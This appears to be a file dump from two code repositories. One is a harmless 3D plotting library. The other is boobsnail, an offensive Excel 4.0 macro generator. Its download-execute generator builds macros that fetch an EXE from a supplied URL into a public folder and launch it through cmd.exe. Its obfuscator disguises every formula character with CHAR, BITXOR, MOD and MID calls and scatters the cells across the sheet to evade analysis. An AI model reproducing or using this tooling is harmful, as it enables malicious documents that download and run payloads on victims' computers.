metadata: dict
text: string (lengths 60 to 3.49M)
{ "source": "aaabbb2021/Trescope", "score": 2 }
#### File: example/src/example_plot_scatter3d.py ```python from trescope import Trescope, Layout from trescope.config import (Scatter3DConfig, ScatterMode, AxisHelper3DConfig) from trescope.toolbox import simpleDisplayOutputs def plot_scatter_3d(): Trescope().initialize(True, simpleDisplayOutputs(1, 3)) Trescope().selectOutput(0).updateLayout(Layout().title('marker')) Trescope().selectOutput(1).updateLayout(Layout().title('line')) Trescope().selectOutput(1).updateLayout(Layout().title('marker+line')) Trescope().selectOutput(0).plotAxisHelper3D().withConfig(AxisHelper3DConfig().width(5).axisLength(.5)) Trescope().selectOutput(0).plotScatter3D( [0, 1, 1, 0], [0, 0, 1, 1], [0, 0, 0, 0] ).withConfig(Scatter3DConfig().color(0xffff0000).mode([ScatterMode.MARKERS])) Trescope().selectOutput(1).plotScatter3D( [0, 1, 1, 0], [0, 0, 1, 1], [0, 0, 0, 0] ).withConfig(Scatter3DConfig().color(0xff00ff00).mode([ScatterMode.LINES])) Trescope().selectOutput(2).plotScatter3D( [0, 1, 1, 0], [0, 0, 1, 1], [0, 0, 0, 0] ).withConfig(Scatter3DConfig().color(0xff0000ff).mode([ScatterMode.MARKERS, ScatterMode.LINES]).width(4).size(8)) if __name__ == '__main__': plot_scatter_3d() ``` #### File: example/src/example_plot_wireframe3d.py ```python from trescope import Trescope from trescope.config import (Wireframe3DConfig) from trescope.toolbox import simpleDisplayOutputs def plot_wireframe_3d(): Trescope().initialize(True, simpleDisplayOutputs(1, 4)) Trescope().selectOutput(0).plotWireframe3D( [0, 1, 1, 0], [0, 0, 1, 1], [0, 0, 0, 0] ).withConfig(Wireframe3DConfig().indices( [0, 3], [1, 1], [3, 2]).color(0xffff0000).width(1)) Trescope().selectOutput(1).plotWireframe3D( [0, 1, 1, 0], [0, 0, 1, 1], [0, 0, 0, 0] ).withConfig(Wireframe3DConfig().indices( [0, 3], [1, 1], [3, 2]).color(0xff00ff00).width(5)) if __name__ == '__main__': plot_wireframe_3d() ``` #### File: trescope/config/PieConfig.py ```python from trescope.config import Config class PieConfig(Config): """Config for :py:meth:`trescope.Output.plotPie`""" def __init__(self): super().__init__() def toDict(self) -> dict: return {**super().toDict()} ``` #### File: trescope/config/Scatter3DConfig.py ```python from typing import List, Union from trescope.config import Config, ScatterMode, ScatterSymbol from trescope.core.Utils import toListIfNumpyOrTensorArray class Scatter3DConfig(Config): """Config for :py:meth:`trescope.Output.plotScatter3D`""" def __init__(self): super().__init__() self.__color: Union(int, List[int]) = 0xff000000 self.__size: float = 5 self.__width: float = 1 self.__mode: List[str] = [ScatterMode.MARKERS] self.__symbol = ScatterSymbol.Circle def color(self, color: Union[int, List[int]]): """ Specify color . :param color: color , default 0xff000000 (means black with no transparency) :return: self , for chain call """ self.__color = color return self def size(self, size: float): """ Specify size . :param size: size , default 5 :return: self , for chain call """ self.__size = size return self def width(self, width: float): """ Specify line width . :param width: width , default 1 :return: self , for chain call """ self.__width = width return self def mode(self, modeCombination: List[str]): """ Specify mode , enumeration of :py:attr:`trescope.config.ScatterMode.MARKERS` , :py:attr:`trescope.config.ScatterMode.LINES` or combination of them . 
:param modeCombination: combination of mode , default `[trescope.config.ScatterMode.MARKERS]` :return: self , for chain call """ self.__mode = modeCombination return self def symbol(self, symbolOrSymbols): """ Specify symbol . :param symbolOrSymbols: symbol , see :py:mod:`trescope.config.ScatterSymbol` , default :py:attr:`trescope.config.ScatterSymbol.Circle` :return: self , for chain call """ self.__symbol = symbolOrSymbols return self def toDict(self): return { **super().toDict(), 'color': toListIfNumpyOrTensorArray(self.__color), 'size': self.__size, 'width': self.__width, 'symbol': self.__symbol, 'mode': self.__mode } ``` #### File: trescope/controller/Label.py ```python from trescope.controller import ControllerNode class Label(ControllerNode): """ Label for information display . """ def __init__(self): super().__init__() self.__value = None self.__openIfLink = True def value(self, value: str): """ Value of label . :param value: value :return: self , for chain call """ self.__value = value return self def openIfLink(self, openIfLink: bool): """ Forward to a new web page if label is a hyper link . :param openIfLink: open if link , default `True` :return: self , for chain call """ self.__openIfLink = openIfLink return self def toDict(self): return {**super().toDict(), 'type': 'Label', 'value': self.__value, 'openIfLink': self.__openIfLink} ``` #### File: trescope/controller/VisualDataPickControl.py ```python from typing import List, Union from trescope.controller import ControllerNode class BoundingBox2D(): """ Image bounding box . """ def __init__(self, x, y, width, height): self.__x = x self.__y = y self.__width = width self.__height = height def __str__(self): return f'(bbox2d,{self.__x},{self.__y},{self.__width},{self.__height})' class VisualDataPickControl(ControllerNode): """ Control for picking visual data , now support **Mesh3D** , **Scatter3D** and **Image bounding box** . """ def __init__(self): super().__init__() self.__attachOutput = None self.__colorWhenPicked: int = 0xff888888 self.__defaultValue: List = [] def attachOutput(self, id: Union[str, int]): """ Specify which output to pick data . :param id: output id :return: self , for chain call """ self.__attachOutput = id return self def colorWhenPicked(self, color: int): """ Specify color when data picked . :param color: color , default 0xff888888 (means light white with no transparency) :return: self , for chain call """ self.__colorWhenPicked = color return self def defaultValue(self, *value): """ Specify default data picked . :param value: value :return: self , for chain call """ self.__defaultValue = value return self def toDict(self): return {**super().toDict(), 'type': 'VisualDataPickControl', 'attachOutput': self.__attachOutput, 'colorWhenPicked': self.__colorWhenPicked, 'value': list(map(str, self.__defaultValue)) } ``` #### File: trescope/core/Input.py ```python from trescope.controller import ControllerNode class Input(object): """ Input for adding control , only works for display output . By adding control , you can input user information to control program execution to complete some jobs , such as labelling . Input data will return by :py:meth:`Trescope.breakPoint` """ def __init__(self, host): from trescope.core import Output self.__host: Output = host def addControl(self, controlNode: ControllerNode): """ Add control . 
:param controlNode: control :return: self , for chain call """ self.__host.getHost()._internalCommit(function='addControl', **self.__host.toDict(), **controlNode.toDict()) return self def waitForControllerWithId(self, controlId, identifier: str = ''): rawResult = self.__host._internalCommit(function='waitForControllerWithId', controlId=controlId, identifier=identifier) controlResult = rawResult['result'] if 'TriggerControl' == controlResult['type']: return controlId return Input.__toValueByType(controlResult['type'], controlResult['newValue']) @staticmethod def __toValueByType(type_, valueString): swithcer = { 'BooleanControl': bool, 'ColorControl': lambda string: int(f'0xff{string[1:]}', 16), # TODO bug alpha 'EnumControl': str, 'RangeControl': float, 'TextControl': str } return swithcer[type_](valueString) ``` #### File: trescope/core/Layout.py ```python from typing import Union, List import numpy as np from trescope.config import Camera, PerspectiveCamera from trescope.core.Utils import toListIfNumpyOrTensorArray class Layout(object): """ Specify output layout , such as title , axis , camera (if 3d data) and so on . """ def __init__(self): self.__title: str = '' self.__camera: Camera = PerspectiveCamera() self.__showLegend: bool = True self.__axisUniformScale: bool = True self.__xTickValues, self.__xTickTexts = None, None self.__legendOrientation = 'h' self.__hoverLabelTextColor = None self.__hoverLabelBackgroundColor = None def title(self, title: str): """ Specify output title . :param title: title :return: self , for chain call """ self.__title = title return self def showLegend(self, show: bool): """ Show legend or not . :param show: True or False , default True :return: self , for chain call """ self.__showLegend = show return self def legendOrientation(self, orientation: str): """ Specify legend orientation . :param orientation: `vertical` or `horizontal` , default `vertical` :return: self , for chain call """ self.__legendOrientation = 'v' if 'vertical' == orientation else 'h' return self def axisUniformScale(self, axisUniformScale: bool): """ Specify axis uniform scale or not . :param axisUniformScale: True or False , default True :return: self , for chain call """ self.__axisUniformScale = axisUniformScale return self def axisXTicks(self, tickValues: Union[List[float], np.ndarray], tickTexts: List[str]): """ Specify x axis ticks . :param tickValues: values of ticks :param tickTexts: text of ticks :return: self , for chain call """ self.__xTickValues = tickValues self.__xTickTexts = tickTexts return self def hoverLabelStyle(self, textColor: int, backgroundColor: int): """ Specify hover label style . :param textColor: text color :param backgroundColor: background color :return: self , for chain call """ self.__hoverLabelTextColor = textColor self.__hoverLabelBackgroundColor = backgroundColor return self def camera(self, camera: Camera): """ Specify camera , only works for 3d data . 
:param camera: camera :return: self , for chain call """ self.__camera = camera return self def toDict(self): return { 'title': self.__title, 'axisUniformScale': self.__axisUniformScale, 'xTickValues': toListIfNumpyOrTensorArray(self.__xTickValues), 'xTickTexts': toListIfNumpyOrTensorArray(self.__xTickTexts), 'showLegend': self.__showLegend, 'legendOrientation': self.__legendOrientation, 'hoverLabelTextColor': self.__hoverLabelTextColor, 'hoverLabelBackgroundColor': self.__hoverLabelBackgroundColor, **self.__camera.toDict() } ``` #### File: trescope/core/Utils.py ```python import os import random import string from pathlib import Path from typing import Union from functools import wraps import numpy as np from trescope.core import ELog class Singleton(type): _instances = {} def __call__(cls, *args, **kwargs): if cls not in cls._instances: cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs) return cls._instances[cls] def singleton(cls, *args, **kw): instances = {} @wraps(cls) def _singleton(): if cls not in instances: instances[cls] = cls(*args, **kw) return instances[cls] return _singleton def generateRandomString(length: int): return ''.join(random.choices(string.ascii_uppercase + string.digits, k=length)) def get_abs_path(path_link_maybe: Union[str, Path]) -> str: if isinstance(path_link_maybe, str): return path_link_maybe if 'http' == path_link_maybe[:4] else os.path.abspath(path_link_maybe) if isinstance(path_link_maybe, Path): return os.fspath(path_link_maybe) return str(path_link_maybe) def toListIfNumpyOrTensorArray(array): try: import torch if isinstance(array, torch.Tensor): array = array.numpy() except: ELog.error('import torch failed') if isinstance(array, np.ndarray): return array.tolist() if isinstance(array, list) and len(array) > 0 and isinstance(array[0], np.ndarray): return [toListIfNumpyOrTensorArray(elementArray) for elementArray in array] return array ```
{ "source": "aaaddress1/boobsnail", "score": 3 }
#### File: aaaddress1/boobsnail/boobsnail.py ```python from excel4lib.generator import * import sys generators = [Excel4NtDonutGenerator, Excel4ExecGenerator, Excel4DownloadExecuteGenerator] banner = """ ___. ___. _________ .__.__ \_ |__ ____ ____\_ |__ / _____/ ____ _____ |__| | | __ \ / _ \ / _ \| __ \ \_____ \ / \\__ \ | | | | \_\ ( <_> | <_> ) \_\ \/ \ | \/ __ \| | |__ |___ /\____/ \____/|___ /_______ /___| (____ /__|____/ \/ \/ \/ \/ \/ Author: @_mzer0 @stm_cyber """ def print_usage(): print(banner) print("Usage: {} <generator>".format(sys.argv[0])) print("Generators:") for g in generators: print("{} - {}".format(g.name, g.description)) if __name__ == "__main__": if len(sys.argv) < 2: print_usage() sys.exit(1) generator = sys.argv[1] for g in generators: if g.name.lower() == generator.lower(): Boobsnail.print_banner() g.run(sys.argv[2:]) sys.exit(1) else: print("Unknown generator {}!".format(generator)) print_usage() sys.exit(1) ``` #### File: generator/download_execute/download_execute_generator.py ```python import sys from excel4lib.generator.generator import * from excel4lib.lang import * class Excel4DownloadExecuteGenerator(Excel4Generator): description = "Downloads and executes EXE file" name = "Excel4DownloadExecuteGenerator" def __init__(self, worksheet_name="DownloadExecute"): Excel4Generator.__init__(self, worksheet_name, Excel4Obfuscator(), desc=Excel4DownloadExecuteGenerator.description) def custom_args(self): ''' Adds command line arguments to ArgumentParser :return: ''' self.args_parser.add_argument("--url", "-u", required=False, help="URL from which download EXE file") def generate_macro(self): if not self.args.url: self.args_parser.error("--url argument is required") sys.exit(1) print("[*] Creating macro with URL {} ...".format(self.args.url)) exe_path = self.macro.variable("exepath", "C:\\Users\\Public\\test.exe") download_call = self.macro.register_url_download_to_file_a("DOWNLOAD") self.macro.formula(download_call.get_call_name(), 0, self.args.url, exe_path, 0, 0) shell_arg = self.macro.variable("args", self.macro.argument("CONCATENATE", "/c ", exe_path)) execute_call = self.macro.register_shell_execute("CMDRUN") self.macro.formula(execute_call.get_call_name(), 0, "open", "C:\\Windows\\System32\\cmd.exe", shell_arg, 0, 5) print("[*] Macro created") if not self.args.disable_obfuscation: Excel4Config.obfuscator.enable = True print("[*] Obfsucating macro with {} obfuscator ...".format(self.obfuscator.name)) else: Excel4Config.obfuscator.enable = False print("[*] Saving output to {} ...".format(self.args.out)) self.macro.to_csv_file(self.args.out) print("[*] Output saved to {}".format(self.args.out)) print("[*] Trigger cords: column: {} row: {}".format(self.macro.trigger_x, self.macro.trigger_y)) @staticmethod def run(args): ''' Runs generator :param args: cli arguments :return: ''' generator = Excel4DownloadExecuteGenerator() generator.init_args() if len(args) == 0: generator.args_parser.print_help() sys.exit(1) generator.parse(args) generator.generate() if __name__ == '__main__': Excel4DownloadExecuteGenerator.run(sys.argv[1:]) ``` #### File: excel4lib/macro/excel4_result.py ```python from .excel4_instruction import * class Excel4Result(Excel4Instruction): ''' Represents cell in which result of another call will be placed (for example Formula((...), R1C2) R1C2 is address of cell in which FORMULA call will save return value in this case R1C2 should be represented as Excel4Result object) ''' def __init__(self, x, y): Excel4Instruction.__init__(self, x, y) def 
__str__(self): return "" class Excel4ResultLoop(Excel4Result): pass class Excel4ResultCondition(Excel4Result): pass class Excel4ResultEndLoop(Excel4Result): pass ``` #### File: macro/obfuscator/excel4_obfuscator.py ```python import random from excel4lib.macro.excel4_macro_extension import * from excel4lib.utils import * from excel4lib.macro.excel4_instruction import * from excel4lib.macro.excel4_argument import * from excel4lib.macro.excel4_formula import * from excel4lib.macro.excel4_value import * from excel4lib.macro.excel4_variable import * from excel4lib.exception import * from excel4lib.config import * from excel4lib.macro.excel4_result import * from excel4lib.macro.excel4_register_formula import * from excel4lib.sheet import * class Excel4Obfuscator(Excel4MacroExtension): name = "standard" description = "Allows to obfuscate macro with standard Excel4.0 formulas suchas BITXOR, SUM, MID etc." ''' Allows to obfuscate formulas, scatter them across worksheet, obfuscate variable names and values. ''' def __init__(self, config=Excel4Config.obfuscator): Excel4MacroExtension.__init__(self) # Obfuscator configuration self.config = config # List of char obfuscation methods self.ob_tech = [] # Max length of cell self.cell_max_length = self.config.cell_limit def _generate_noise(self, only_empty = False): ''' Adds random values to worksheet cells :param only_empty: flags that tells if add noise only to empty cells ( not reserved) ''' # Walk through worksheet cell by cell for cords in self.worksheet.worksheet_iterate(): # Choose whether add noise to this cell or not if random.randint(0,10) != 1: continue noise = random_string(random.randint(4, 20)) noise_cell = self._create_value(cords[0], cords[1], noise) # Check if cell is reserved if self.worksheet.is_reserved(cords[0], cords[1]): if only_empty: continue # Check if obfuscation of cell is enabled cell = self.worksheet.get_cell(cords[0], cords[1]) if not cell._spread or not cell._obfuscate: continue try: # Move cell to the next cell if reserved self.worksheet.move_cell(cell) except CouldNotMoveCellException as ex: continue curr_cords = self.worksheet.get_current_cords() # Add noise self.worksheet.add_cell(noise_cell) self.worksheet.set_current_cords(curr_cords[0], curr_cords[1]) def _spread_formulas(self, trigger_x, trigger_y): ''' Spreads formulas across cells in worksheet :param trigger_x: number of column in which first call is placed :param trigger_y: number of row in which first call is placed ''' # Get current cords. We need to remember current cord cause we will want to back execution to this cell. 
cords_backup = self.worksheet.get_current_cords() cells_cache = {} # Get cells to spread # For each column in worksheet for t in self.worksheet.column_iterate(): # Get column number c_num = t[0] # Get cells in column cells_temp = t[1] if not cells_temp: continue values = cells_temp.values() # For each cell in column for cell in values: # Check if obfuscation of cell/formula is enabled if (not cell._spread) or (not cell._obfuscate): continue # Save cell in cache try: cells_cache[c_num][cell.y] = cell except KeyError: cells_cache[c_num] = {cell.y : cell} # Remove cells from worksheet # For each column in cache for c in cells_cache.keys(): for cell in cells_cache[c].values(): # Remove cell from worksheet # x,y of cell will be changed, and cell will be placed at another cords self.worksheet.remove_cell(cell) trigger_cell = None # Add jump to first call if trigger_x in cells_cache: # Find first call for row in cells_cache[trigger_x]: if row >= trigger_y: trigger_cell = self._go_to(trigger_x, row, cells_cache[trigger_x][row]) self.worksheet.add_cell(trigger_cell) break # Spread cells across worksheet # For each column in cache for c in cells_cache.keys(): self._spread_column(list(cells_cache[c].values()), trigger_x, trigger_y, trigger_cell) # Restore original cords self.worksheet.set_current_cords(cords_backup[0], cords_backup[1]) def _spread_column(self, cells, trigger_x, trigger_y, trigger_cell): ''' Spread `cells` across worksheet. :param cells: list of cells that are in the same column :param trigger_x: auto_open or auto_close function column :param trigger_y: auto_open or auto_close function row :param trigger_cell: auto_open or auto_close cell ''' # Number of cells cells_num = len(cells) # The number of formulas that have already been spread across sheet cnt = 0 fail_cnt = 0 for_loop_cache = [] if not cells: return while cnt < cells_num: # Generate random cords # IF all columns are reserved then add new one and place payoad there if fail_cnt > 1000: self.config.spread_x_max = self.config.spread_x_max + 1 target_x = self.config.spread_x_max else: target_x = random.randint(self.config.spread_x_min, self.config.spread_x_max) target_y = random.randint(self.config.spread_y_min, self.config.spread_y_max) # Space between auto_open/auto_close cell and first call should be empty if(target_x == trigger_x) and (target_y in range(trigger_y, trigger_cell.y)): continue # If the same coordinates are drawn then randomize again if (target_x == self.worksheet._curr_x) and (target_y == self.worksheet._curr_y): # Inc failure counter fail_cnt = fail_cnt + 1 continue height = random.randint(1, cells_num - cnt) # Check if cells are free # We need to add 1 to height since we need additional cell for GOTO formula if self.worksheet.is_reserved(target_x, target_y, height + 1 + 1 + 1): # Inc failure counter fail_cnt = fail_cnt + 1 continue self.worksheet.set_current_cords(target_x, target_y) cnt_h = cnt+height # Add random number of cells to worksheet at random cords for cell in cells[cnt:cnt_h]: # Loops require end statement in the same column # So we need to place them in the same one if issubclass(type(cell), Excel4LoopFormula): # Save column and row number of this loop for_loop_cache.append((self.worksheet._curr_x, self.worksheet._curr_y + (cnt_h - cnt) + 2)) elif issubclass(type(cell), Excel4EndLoopFormula): break self.worksheet.add_next_cell(cell) cnt = cnt + 1 # If there are more cells to spread if cnt < cells_num: # @HACK # If cells[cnt] is Ecel4Variable then get_reference function will return variable name # 
But if this variable name is not defined or this variable name is not storing address of another cell # then we can't GOTO to this formula(we need address of this formula). # So to bypass this we need to add an empty Excel4Value, because then get_reference function will return address of cell if issubclass(type(cells[cnt]), Excel4Variable): empty = self._create_empty_formula(cells[cnt].x, cells[cnt].y) cells.insert(cnt, empty) cells_num = cells_num + 1 # If there are more cells to spread, then redirect macro execution # to the next cell. self.worksheet.add_next_cell(self._go_to(-1, -1, cells[cnt])) else: break if issubclass(type(cells[cnt]), Excel4EndLoopFormula): if len(for_loop_cache) < 1: raise Excel4LoopFormulaMissing("Excel4EndLoopFormula detected but Excel4LoopFormula is missing. Excel4 requires that the loops and NEXT() formula be in the same column.") cords = for_loop_cache.pop() cells[cnt].x = cords[0] cells[cnt].y = cords[1] self.worksheet.add_cell(cells[cnt]) cnt = cnt + 1 # If there are more cells to spread if cnt < cells_num: # @HACK # If cells[cnt] is Ecel4Variable then get_reference function will return variable name # But if this variable name is not defined or this variable name is not storing address of another cell # then we can't GOTO to this formula(we need address of this formula). # So to bypass this we need to add an empty Excel4Value, because then get_reference function will return address of cell if issubclass(type(cells[cnt]), Excel4Variable): empty = self._create_empty_formula(cells[cnt].x, cells[cnt].y) cells.insert(cnt, empty) cells_num = cells_num + 1 # If there are more cells to spread, then redirect macro execution # to the next cell. self.worksheet.add_cell(self._go_to(cells[cnt-1].x, cells[cnt-1].y + 1, cells[cnt])) else: break # ADD RETURN self.worksheet.add_next_cell(self._create_formula(-1, -1, "RETURN")) def _create_argument_object(self, instruction, *args): instruction_name = Excel4InstructionName(instruction, self.config.translate) o = Excel4FormulaArgument(instruction_name, *args) if not self.config.translate: # Do not translate obfuscator objects o.revert_translation() return o def _create_formula(self,x, y, instruction, *args): instruction_name = Excel4InstructionName(instruction, self.config.translate) o = Excel4Formula(x, y, instruction_name, *args) if not self.config.translate: # Do not translate obfuscator objects o.revert_translation() return o def _create_value(self, x, y, value): o = Excel4Value(x,y, value) if not self.config.translate: # Do not translate obfuscator objects o.revert_address_translation() return o def _create_empty_formula(self, x, y): return self._create_value(x,y,"") def _create_result_formula(self, x, y): o = Excel4Result(x,y) if not self.config.translate: # Do not translate obfuscator objects o.revert_address_translation() return o def _go_to(self, x, y, formula): instruction_name = Excel4InstructionName("GOTO", self.config.translate) o = Excel4GoToFormula(x, y, instruction_name, formula) if not self.config.translate: # Do not translate obfuscator objects o.revert_translation() return o def _char(self, s): ''' Returns CHAR formula :param s: string, char :return: ''' return self._create_argument_object("CHAR", s) def char(self, c): ''' Puts c character in CHAR formula :param c: charcater :return: CHAR formula call ''' if not is_number(c): c = ord(c) return self._char(c) def int(self, c): ''' Converts c character to CHAR(INT(C)) call :param c: charcater :return: ''' if not is_number(c): c = ord(c) return 
self._char(self._create_argument_object("INT", str(c))) def sum(self, c): ''' Converts c character to CHAR(SUM(R, c-k/k-c) call :param c: charcater :return: ''' if not is_number(c): c = ord(c) k = random.randint(1, 1000) while k == c: k = random.randint(1, 1000) if k < c: r = c - k else: r = k - c return self._char(self._create_argument_object("SUM", r, k)) def mid(self, c): ''' Converts c character to MID(STR, RAND_INDEX,1) call :param c: charcater :return: ''' if is_number(c): c = chr(c) length = random.randint(3, 8) rand_str = random_string(length) rand_ind = random.randint(0, length) rand_str = rand_str[:rand_ind] + c + rand_str[rand_ind:] return self._create_argument_object("MID", rand_str, rand_ind+1, 1) def xor(self, c): ''' Converts c character to CHAR(BITXOR(R,K) call :param c: charcater :return: ''' if not is_number(c): c = ord(c) k = random.randint(1, 1000) while k == c: k = random.randint(1, 1000) r = k ^ c return self._char(self._create_argument_object("BITXOR", r, k)) def mod(self, c): ''' Converts c character to CHAR(MOD(R,K) call :param c: charcater :return: ''' if not is_number(c): c = ord(c) k = random.randint(c + 1, 600) r = k + c return self._char(self._create_argument_object("MOD", r, k)) def evaluate(self, c): #=CHAR(EVALUATE("1+64")) pass def concat(self, x, y, *args): ''' Creates CONCATENATE formula ''' return self._create_formula(x, y, "CONCATENATE", *args) def _update_obfuscation_tech(self): self.ob_tech = [] if self.config.obfuscate_int: self.ob_tech.append(self.int) if self.config.obfuscate_char: self.ob_tech.append(self.char) if self.config.obfuscate_mid: self.ob_tech.append(self.mid) if self.config.obfuscate_xor: self.ob_tech.append(self.xor) if self.config.obfuscate_mod: self.ob_tech.append(self.mod) def _obfuscate_char(self, c): if c == '"': formula = self.char(c) else: self._update_obfuscation_tech() func = random.choice(self.ob_tech) formula = func(c) return formula def _split_instructions(self, objects, block_size): i = 0 temp = [] for o in objects: if issubclass(type(o), Excel4FormulaArgument): # For arguments we need to compute length of full instruction with arguments o_len = o.get_length() elif issubclass(type(o), Cell): # For calls (instructions in cells) we will use references so length we be equal to address of the cell o_len = len(o.get_address()) else: raise Excel4UnsupportedTypeException("Received unsupported type: {}".format(type(o))) if (i+o_len) > block_size: yield temp i = 0 temp = [] i = i + o_len temp.append(o) if temp: yield temp def _obfuscate_formula(self, formula): ''' Obfuscates formula object. Should work for all classes that inherit from Excel4Formula. _obfuscate_formula works as follow: - convert formula with arguments to string ex: =TEST("A","B"); - for each character in formula string: - obfuscate character with random function such as: MID, SUM, MOD etc. 
- end of loop - generate CONCATENATE formulas in order to concatenate all characters during excel 4.0 macro execution; - pass deobfuscated string to FORMULA call ex: =FORMULA(DEOBFUSCATED, ADDRESS_TO_SAVE_FORMULA) :param formula: :return: ''' if not formula._obfuscate_formula: return [] formulas = self._obfuscate_text(str(formula), formula.tag) # Obfusacted formula will be deobfusacted and saved into following cell # So you can get result of your formula from this cell # This one is empty because cell will be filled after excel 4.0 macro execute # @HACK if issubclass(type(formula), Excel4LoopFormula): call_reference = Excel4ResultLoop(0, 0) elif issubclass(type(formula), Excel4ConditionFormula): call_reference = Excel4ResultCondition(0, 0) elif issubclass(type(formula), Excel4EndLoopFormula): call_reference = Excel4ResultEndLoop(0, 0) else: call_reference = self._create_result_formula(0, 0) call_reference.tag = formula.tag result_formula = self._create_formula(0, 0, "FORMULA", formulas[-1], call_reference) call_reference.start_cell = formulas[0] formulas.append(result_formula) formulas.append(call_reference) return formulas def obfuscate_formula(self, formula): ''' :param formula: :return: ''' formulas = self._obfuscate_formula(formula) if formulas: formulas[-1].x = formula.x formulas[-1].y = formula.y return formulas def obfuscate_formulas(self, fomulas): ''' Obfuscates formulas. Formulas should be ordered by execution. This function also adds obfusacted formulas to the worksheet. :param fomulas: :return: ''' obfuscated_formulas = [] column = self.worksheet.get_column(self.macro.trigger_x) if not column: # Raise exception return start_of_macro = None # Find first call in trigger column for cell in column.values(): if cell.y >= self.macro.trigger_y: start_of_macro = cell break for f in fomulas: if not f._obfuscate: continue if issubclass(type(f), Excel4Formula): # Obfuscate formula call obfuscated = self.obfuscate_formula(f) # If formula is not obfuscated, then continue execution if not obfuscated: continue # If obfuscated, then formula is splitted into multiple CONCATENATE and FORMULA calls. # Last element in obfuscated variable(list) is cell in which deobfuscated formula # will be placed during macro execution. obfuscated_ref = obfuscated[-1] # Add all formulas to worksheet for o in obfuscated[:-1]: #self.worksheet.add_above(o, f) obfuscated_formulas.append(o) # Replace formula f with obfuscated_ref in worksheet self.worksheet.replace_cell(f, obfuscated_ref) # Update references # Formula object (f) holds references to objects in which is used. 
# We need to change these references to point to the obfuscated_ref obfuscated_ref.x = f.x obfuscated_ref.y = f.y f._change_reference(obfuscated_ref) if start_of_macro == f: start_of_macro = obfuscated_ref # Spread obfuscated formulas across the worksheet self._spread_column(obfuscated_formulas, self.macro.trigger_x, self.macro.trigger_y, start_of_macro) # Redirect macro 4 execution to deobfuscate formulas self.worksheet.replace_cell(start_of_macro, self.macro._create_go_to(start_of_macro.x, start_of_macro.y, obfuscated_formulas[0])) # After deobfuscation redirect execution to original formula start_of_macro.x = obfuscated_formulas[-1].x start_of_macro.y = obfuscated_formulas[-1].y + 1 return_stm = self.worksheet.get_cell(obfuscated_formulas[-1].x, obfuscated_formulas[-1].y+1) #self.worksheet.add_above(self._create_formula(return_stm,return_stm.y, "PAUSE"), return_stm) self.worksheet.add_above(start_of_macro, return_stm) def obfuscate_function_name(self, formula): if not issubclass(type(formula), Excel4RegisterFormula): raise Excel4WrongVariableType("Only instances of Excel4RegisterFormula could be obfuscated. Provided: {}".format(type(formula))) if formula._obfuscate: formula.set_function_text(random_string(random.randint(4, 10))) return formula def obfuscate_variable_name(self, formula): if not issubclass(type(formula), Excel4Variable): raise Excel4WrongVariableType("Only instances of Excel4Variable could be obfuscated. Provided: {}".format(type(formula))) if formula._obfuscate: formula.set_name(random_string(random.randint(4, 10))) return formula def obfuscate_variable_value(self, formula): if not issubclass(type(formula), Excel4Variable): raise Excel4WrongVariableType("Only instances of Excel4Variable could be obfuscated. Provided: {}".format(type(formula))) formulas = [] if formula._obfuscate: # Do not obfuscate numbers try: if is_number(formula.value): raise Exception("Obfuscation of numbers not supported") elif issubclass(type(formula.value), Cell): # Obufscate address raise Exception("Obfuscation of Cell objects not supported") formulas = self._obfuscate_text(formula.value, formula.tag) # Set value as address of cell in which deobfuscated value will be saved formula.value = formulas[-1] except: pass return formulas def _obfuscate_variable(self, formula): # Obfuscate variable name #formula.name = random_string(random.randint(4,10)) # Obfuscate variable value if it's behaviour is similar to str formulas = [] try: if issubclass(type(formula.value), Excel4Value): if formula.value.is_num(): raise Exception() formulas = self._obfuscate_text(formula.value, formula.tag) # Set value as address of cell in which deobfuscated value will be saved formula.value = formulas[-1] except: pass # Add variable as last call formulas.append(formula) return formulas def _obfuscate_text(self, text, tag=""): ''' Obfuscates every char in text and returns concat formulas that allows to restore original string :param text: string to obfuscate :return: ''' text_len = len(text) block_len = self.cell_max_length # Obfusacted characters obfuscated_chars = [] # List of concat formulas which allows to restore original string concat_objects = [[]] # Obfusacte every char in text for i in range(0, text_len): c = text[i] obfuscated_chars.append(self._obfuscate_char(c)) # Pass obfusacted chars to concat formula for o in self._split_instructions(obfuscated_chars, block_len): concat_objects[0].append(self.concat(0, 0, *o)) # If there is more than one concatenate formula then we need to concatenate these formulas # Here is a 
little bug. At this stage we don't know what address has concatenate formula. # So we don't know the exact length of this formula. i = 0 while True: concat_objects.append([]) for o in self._split_instructions(concat_objects[i], block_len): concat_objects[i + 1].append(self.concat(0, 0, *o)) if len(concat_objects[i + 1]) < 2: break i = i + 1 r = [] if not tag: tag = random_tag(text) for o in concat_objects: for x in o: x.tag = tag r.append(x) return r ``` #### File: boobsnail/tests/test_excel4_formula.py ```python from unittest import TestCase from excel4lib.macro import * class TestExcel4Formula(TestCase): def test_translate(self): formula = Excel4Formula(1, 1, "GOTO") self.assertEqual(str(formula.instruction), "GOTO", "Should be GOTO") instruction = formula.get_instruction_translation("pl_PL") self.assertEqual(str(instruction), "PRZEJDŹ.DO", "Should be PRZEJDŹ.DO") self.assertEqual(str(formula.instruction), "GOTO", "Should be GOTO") def test_get_str(self): formula = Excel4Formula(1, 1, "GOTO") self.assertEqual(str(formula), "=GOTO()", "Should be =GOTO()") instruction = formula.get_str("pl_PL") self.assertEqual(str(instruction), "=PRZEJDŹ.DO()", "Should be =PRZEJDŹ.DO()") self.assertEqual(str(formula.get_str()), "=GOTO()", "Should be =GOTO()") jump = Excel4Formula(1, 1, "GOTO") goto = Excel4Formula(1, 1, "GOTO", jump) self.assertEqual(str(goto), "=GOTO(R1C1)", "Should be: =GOTO(R1C1)") self.assertEqual(str(goto.get_str("pl_PL")), "=PRZEJDŹ.DO(W1K1)", "Should be: =PRZEJDŹ.DO(W1K1)") self.assertEqual(str(jump), "=GOTO()", "Should be: =GOTO()") self.assertEqual(str(jump.get_reference()), "R1C1", "Should be: R1C1") self.assertEqual(str(goto.get_str()), "=GOTO(R1C1)", "Should be: =GOTO(R1C1)") class TestExcel4GoToFormula(TestCase): def test__parse_args(self): # String goto = Excel4GoToFormula(1,1,"GOTO","TEST") val = "\"TEST\"" self.assertEqual(str(goto._parse_args()), val, "Should be: "+val) # Numeric goto = Excel4GoToFormula(1,1,"GOTO",12) val = "12" self.assertEqual(str(goto._parse_args()), val, "Should be: "+val) # Logical goto = Excel4GoToFormula(1,1,"GOTO", Excel4LogicalTest(1,"=",Excel4FormulaArgument("GOTO"))) val = "1=GOTO()" self.assertEqual(str(goto._parse_args()), val, "Should be: " + val) val = "1=PRZEJDŹ.DO()" self.assertEqual(str(goto._parse_args("pl_PL")), val, "Should be: "+val) # Argument 